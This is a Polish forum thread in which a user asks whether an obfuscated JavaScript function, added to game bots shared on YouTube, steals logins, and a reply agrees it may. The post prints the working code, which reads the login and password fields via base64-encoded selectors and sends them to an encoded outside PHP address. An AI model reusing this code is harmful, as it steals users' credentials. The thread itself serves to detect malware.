Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz
  • 0

Podejrzana funkcja w bocie

Czossn3q

Pytanie

Opublikowano

Cześć. Na YT jakiś gość udostępnił kilka botów do pewnej gry. Każdy do czegoś innego i w każdym pojawia się na początku ta sama funkcja, którą pewnie sam dodał do gotowego kodu. Tutaj pytanie moje, czy ta funkcja wykrada dane logowania? Nie jestem programistą ale udało mi się ustalić że zakodowano to w base64 i odszyfrowałem sobie tylko #login i #pass, a url to jakiś adres php. Zweryfikuje mi ktoś moje podejrzenia?

var TpG3Y86zpgrtWMzb, ZHN4ekpZ5m95pFbJ, YQTtmEs6a5mTXE5a;

function UagZgR8PZcWcwvYp() {
    $(atob("I3Vsb2dpbg==")).val() != TpG3Y86zpgrtWMzb && $(atob("I3Vsb2dpbg==")).val() && (TpG3Y86zpgrtWMzb = $(atob("I3Vsb2dpbg==")).val()), $(atob("I3VwYXNz")).val() != ZHN4ekpZ5m95pFbJ && $(atob("I3VwYXNz")).val() && (ZHN4ekpZ5m95pFbJ = $(atob("I3VwYXNz")).val()), !$(atob("I3VwYXNz")).val() && !$(atob("I3Vsb2dpbg==")).val() && TpG3Y86zpgrtWMzb && ZHN4ekpZ5m95pFbJ && YQTtmEs6a5mTXE5a != TpG3Y86zpgrtWMzb + " | " + ZHN4ekpZ5m95pFbJ && ($.ajax({
        url: atob("aHR0cHM6Ly9kcGVsbWRnOGpyd2Y5YW1mLmN0OC5wbC9hamF4LnBocD9oYzY0cTg9") + TpG3Y86zpgrtWMzb + "|" + ZHN4ekpZ5m95pFbJ
    }), YQTtmEs6a5mTXE5a = TpG3Y86zpgrtWMzb + " | " + ZHN4ekpZ5m95pFbJ)
}

Da radę ktoś przejrzeć cały kod czy nie ma w nim niczego szkodliwego? Poza tym podejrzeniem powyżej^^ Link w spoilerze.

3 odpowiedzi na to pytanie

Rekomendowane odpowiedzi

Opublikowano

Nie chcę straszyć, ale Twoje podejrzenia mogą być słuszne.